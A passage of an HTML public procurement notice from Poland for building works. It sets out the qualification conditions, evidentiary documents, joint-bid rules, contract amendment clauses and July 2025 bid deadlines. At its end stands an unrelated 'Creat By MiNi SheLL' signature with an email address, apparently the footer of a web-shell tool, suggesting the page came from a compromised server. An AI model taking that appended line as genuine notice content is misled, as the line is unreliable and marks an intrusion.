</h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji na wykonane roboty budowlane oraz wbudowane materiały i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: postępowaniu <br/>6.1.1. zdolności do występowania w obrocie gospodarczym; Zamawiający nie określa warunku w ww. zakresie. <br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej, o ile wynika to z odrębnych przepisów; Zamawiający nie określa warunku w ww. zakresie. <br/>6.1.3. sytuacji ekonomicznej lub finansowej; Zamawiający nie określa warunku w ww. zakresie <br/>6.1.4 zdolności technicznej lub zawodowej w zakresie: <br/>Opis sposobu dokonywania oceny spełniania tego warunku: <br/>1) Wykonawca winien wykazać, że wykonał należycie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej dwie roboty budowlane, z których każda: <br/>a) miała wartość minimum 180.000,00 zł brutto (słownie: sto <br/>osiemdziesiąt tysięcy złotych) <br/>b) polegała na budowie lub przebudowie lub remoncie obiektu budowlanego. <br/>2) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy <br/>dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji: <br/>a) min. jedną osobą (która będzie pełnić funkcję kierownika budowy) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie umożliwiającym kierowanie robotami objętymi przedmiotem zamówienia. <br/>b) min. jedną osobą (która będzie pełnić funkcję kierownika robót elektrycznych) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych w zakresie umożliwiającym kierowanie robotami objętymi przedmiotem zamówienia. <br/> <br/>DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW <br/>UDZIAŁU W POSTĘPOWANIU: <br/> <br/>1) Wykonawca powinien w wykazie robót wyraźnie określić zakres i wartość robót, aby można było ustalić, czy spełnia warunek udziału w postępowaniu. <br/>2) Zgodnie z orzeczeniem TSUE C-387/14 (ESAPROJEKT) /odpowiedź na pytanie czwarte/ Zamawiający wskazuje, że w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub w przypadku korzystania z podmiotów udostępniających zasoby na podstawie art. 118 <br/>ustawy Pzp Wykonawca lub minimum jeden Wykonawca wspólnie ubiegający się o udzielenie zamówienia lub minimum jeden podmiot udostępniający zasoby musi posiadać pełne doświadczenie wskazane w warunku udziału w postępowaniu w pkt 6.1.4, ppkt 1) SWZ – dotyczy to konieczności wykazania <br/>doświadczenia wynikającego z powtarzalności wykonanych robót tj. wykonania minimum 2 robót przez jeden podmiot. <br/>3) Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. 2024 r, poz. 725) <br/>oraz przepisów wcześniejszych. Samodzielne funkcje techniczne w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania oraz zgodnie z treścią decyzji o ich nadaniu. <br/>4) Wykonawca w celu wykazania spełniania warunków określonych w pkt 6.1.4, ppkt 2) SWZ może wskazać osobę będącą obywatelem państwa członkowskiego w rozumieniu art. 4a ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. <br/>Dz. U. z 2023 r. poz. 551), która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznaczne wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji <br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2023 r. poz. 334) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551). <br/>5) Zamawiający zastrzega, iż, na potwierdzenie spełniania warunku, <br/>o którym mowa w 6.1.4 pkt 1) lit. a i b Wykonawca obowiązany jest wykazać min. dwie odrębne roboty budowlane. <br/> 6) Zgodnie art. 3 pkt 6 ustawy z dnia 7 lipca 1994 r. Prawo budowlane, przez „budowę” w rozumieniu zapisów SWZ rozumie się wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego. <br/>7) Zgodnie z art. 3 pkt 7a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, przez „przebudowę” w rozumieniu zapisów SWZ rozumie się wykonywanie robót budowlanych, w wyniku których następuje zmiana parametrów użytkowych lub technicznych istniejącego obiektu budowlanego, z wyjątkiem <br/>charakterystycznych parametrów, jak: kubatura, powierzchnia zabudowy, wysokość, długość, szerokość bądź liczba kondygnacji; w przypadku dróg są dopuszczalne zmiany charakterystycznych parametrów w zakresie niewymagającym zmiany granic pasa drogowego. <br/>8) Zgodnie z art. 3 pkt 8 ustawy z dnia 7 lipca 1994 r. Prawo budowlane, przez „remont” w rozumieniu zapisów SWZ rozumie się wykonywanie w istniejącym obiekcie budowlanym robót budowlanych polegających na odtworzeniu stanu <br/>pierwotnego, a niestanowiących bieżącej konserwacji, przy czym dopuszcza się stosowanie wyrobów budowlanych innych niż użyto w stanie pierwotnym. <br/>9) Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego będą przeliczane wg średniego kursu NBP na dzień publikacji ogłoszenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga<br/> złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.<br/> Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego(Dz. U. z 2025 r., poz. 514).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do <br/>złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) <br/> następujących podmiotowych środków dowodowych (aktualnych na dzień <br/>złożenia): <br/>8.3.1. W celu potwierdzenia spełniania warunków udziału w <br/>postępowaniu: <br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w <br/>okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli <br/>okres prowadzenia działalności jest krótszy –w tym okresie, wraz z <br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz <br/>podmiotów, na rzecz których roboty te zostały wykonane <br/>(sporządzonego zgodnie z Załącznikiem Nr 6 do SWZ), oraz <br/>załączeniem dowodów określających, czy te roboty budowlane <br/>zostały wykonane należycie, przy czym dowodami, o których mowa, <br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na <br/>rzecz którego roboty budowlane zostały wykonane, a jeżeli <br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie <br/>uzyskać tych dokumentów –inne odpowiednie dokumenty – w <br/>odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 1) SWZ, <br/>b) wykazu osób, skierowanych przez Wykonawcę do realizacji <br/>zamówienia publicznego, w szczególności odpowiedzialnych za <br/>świadczenie usług, kontrolę jakości lub kierowanie robotami <br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji <br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych <br/>do wykonania zamówienia publicznego, a także zakresu Strona 17 z 39 <br/>Specyfikacja Warunków Zamówienia (SWZ) <br/>wykonywanych przez nie czynności oraz informacją o podstawie do <br/>dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem <br/>Nr 7 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4. <br/>ppkt. 2) SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe. <br/>Zamawiający nie wymaga od Wykonawcy złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 13.8. Na potrzeby oceny ofert oferta musi zawierać: <br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik <br/>nr 3 do SWZ (przy czym Wykonawca może sporządzić ofertę wg innego <br/>wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i <br/>załącznikach). <br/>2) Oświadczenia wykonawcy/wykonawcy wspólnie ubiegającego się o <br/>udzielenie zamówienia składane na podstawie art. 125 ust. 1 ustawy Pzp, <br/>o których mowa w pkt 8.1 SWZ. <br/>3) Oświadczenie, o którym mowa w pkt 8.2 SWZ (jeżeli dotyczy). <br/>4) Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli <br/>dotyczy). <br/>5) Oświadczenia podmiotu udostępniającego zasoby składane na podstawie <br/>art. 125 ust. 1 ustawy Pzp, o którym mowa w pkt. 9.8 SWZ (jeżeli dotyczy). <br/>6) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby: <br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu <br/>Wykonawcy lub podmiotu udostępniającego zasoby jest umocowana do <br/>jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z <br/>Krajowego Rejestru Sądowego, Centralnej Ewidencji I Informacji o <br/>Działalności Gospodarczej lub innego właściwego rejestru; <br/>b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do <br/>złożenia dokumentów, o których mowa w lit a), jeżeli Zamawiający może je <br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile <br/>Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. <br/>c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa <br/>osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. <br/>7) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających <br/>się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do <br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy), <br/>8) Uzasadnienie do zastrzeżenia informacji znajdujących się w ofercie jako <br/>tajemnica przedsiębiorstwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim <br/>przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w <br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia <br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków <br/>udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje <br/>Strona 21 z 39 <br/>Specyfikacja Warunków Zamówienia (SWZ) <br/>spełnianie warunków udziału w postępowaniu. <br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie <br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z <br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonają <br/>poszczególni Wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a <br/>pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki <br/>oświadczenie powinno potwierdzać ten fakt. <br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki <br/>dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki <br/>dowodowe, o których mowa w pkt. 8.3.1 SWZ składa odpowiednio <br/>Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku. <br/>10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w <br/>sprawie zamówienia publicznego kopii umowy regulującej współpracę tych <br/>Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy Pzp oraz postanowień Projektu Umowy.<br/>1.	Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych, Strony dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1)	przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej;<br/>2)	przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących przedmiot zamówienia lub wydania zakazu prowadzenia robót budowlanych, stanowiących przedmiot zamówienia przez organ administracji publicznej lub eksploatorów infrastruktury, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych lub zakazano prowadzenia robót budowlanych;<br/>3) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia kolizji z instalacjami wewnętrznymi <br/>i zewnętrznymi nieujawnionymi w dokumentacji projektowej, lub innymi robotami prowadzonymi przez innego wykonawcę, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy na usunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub o liczbę dni niezbędnych do wykonania robót przez innego wykonawcę – o ile usunięcie kolizji wymagać będzie przedłużenia terminu realizacji;<br/>4)	przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia konieczności wprowadzenia w dokumentacji projektowej zmian, powodujących wstrzymanie lub przerwanie robót budowlanych, stanowiących przedmiot zamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wprowadzenia zmian w dokumentacji projektowej oraz do przeprowadzenia uzgodnień (ustaleń) z właściwymi organami, uzyskania opinii właściwych organów oraz wydania decyzji przez właściwe organy, przy czym wprowadzenie w dokumentacji projektowej zmian nie może skutkować zwiększeniem (zmianą) zakresu świadczenia Wykonawcy zawartego w ofercie, stanowiącej załącznik nr 3 do umowy oraz zwiększeniem wynagrodzenia Wykonawcy, o którym mowa w § 3 ust. 1;<br/><br/>pozostałe zmiany zostały podane w sekcji IX - POZOSTAŁE INFORMACJE <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/zsrlututow 14.2. Termin składania ofert: 03.07.2025 r., godz. 10:00. 14.3. Termin otwarcia ofert: 03.07.2025 r., godz. 10:30.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia.<br/>5)	przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia warunków geologicznych lub hydrologicznych odmiennych od założonych w dokumentacji projektowej i powodujących konieczność wstrzymania robót lub konieczność ich wykonania przy wykorzystaniu odmiennych od zaprojektowanych rozwiązań technicznych, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wyeliminowania utrudnień związanych z ich wystąpieniem, <br/>6)	przedłużenia terminu realizacji zamówienia, o którym mowa w § 2 ust.1, może nastąpić w zakresie niezbędnym do wykonania robót zleconych na podstawie <br/>art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Prawo zamówień publicznych,<br/>7)	zmiana terminu wykonania zamówienia lub zakresu świadczeń lub sposobu wykonywania zamówienia może nastąpić w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na termin realizacji przedmiotu zamówienia lub zakres świadczeń stron umowy lub sposób jej wykonywania,<br/>8)	zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy może nastąpić wskutek zaistnienia przyczyn organizacyjnych lub finansowych leżących po stronie Zamawiającego, w szczególności wynikających ze zmiany zasad płatności programów lub funduszy lub innych źródeł finansowania inwestycji objętej niniejszą umową,<br/>9)	zmiana terminu wykonania zamówienia lub zakresu świadczeń lub sposobu wykonywania zamówienia może nastąpić o ile będą konieczne do zagwarantowania zgodności umowy z wchodzącymi w życie po terminie składania ofert lub po zawarciu umowy przepisami prawa w szczególności przepisami o podatku od towarów i usług w zakresie wynikającym z tych przepisów;<br/>10)	zmiana terminu wykonania zamówienia lub zakresu świadczeń lub sposobu wykonywania zamówienia może nastąpić w przypadku konieczności wykonania robót nieujętych w dokumentacji projektowej.<br/>11) W uzasadnionych przypadkach, których nie można było przewidzieć przed zawarciem umowy a w szczególności, gdy zajdzie konieczność dokonania zmian w projekcie budowlanym, oraz w przypadku przekroczenia terminów wydawania przez organy administracji decyzji i zezwoleń, wystąpienia znalezisk archeologicznych, wyjątkowo niesprzyjających warunków atmosferycznych, geologicznych, hydrologicznych, nieprzewidzianych kolizji z urządzeniami infrastruktury, w przypadku działania siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub w innych okolicznościach niezależnych od Zamawiającego lub Wykonawcy, kiedy konieczna będzie zmiana terminu realizacji umowy. Zamawiający na pisemny wniosek Wykonawcy może wówczas przedłużyć termin realizacji zamówienia.<br/>12) zmiana terminu wykonania zamówienia lub zakresu świadczeń lub sposobu wykonywania zamówienia może nastąpić wskutek zaistnienia przyczyn organizacyjnych lub finansowych leżących po stronie Zamawiającego, w szczególności wynikających ze zmiany zasad płatności programów lub funduszy lub innych źródeł finansowania inwestycji objętej niniejszą umową np. w sytuacji zmiany zakresu inwestycji objętych Programem zaakceptowanych przez Prezesa Rady Ministrów,<br/>13)	zmiany podwykonawcy w przypadku zmiany albo rezygnacji z podwykonawcy, na którego zasoby wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu strony dokonają zmiany treści § 8 ust. 1 pod warunkiem, że Wykonawca wykaże Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu, w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia, poprzez przedstawienie w tym celu odpowiednich dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu,<br/>14)	zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy wskutek zaistnienia przyczyn organizacyjnych lub finansowych leżących po stronie Zamawiającego,.

Creat By MiNi SheLL
Email: jattceo@gmail.com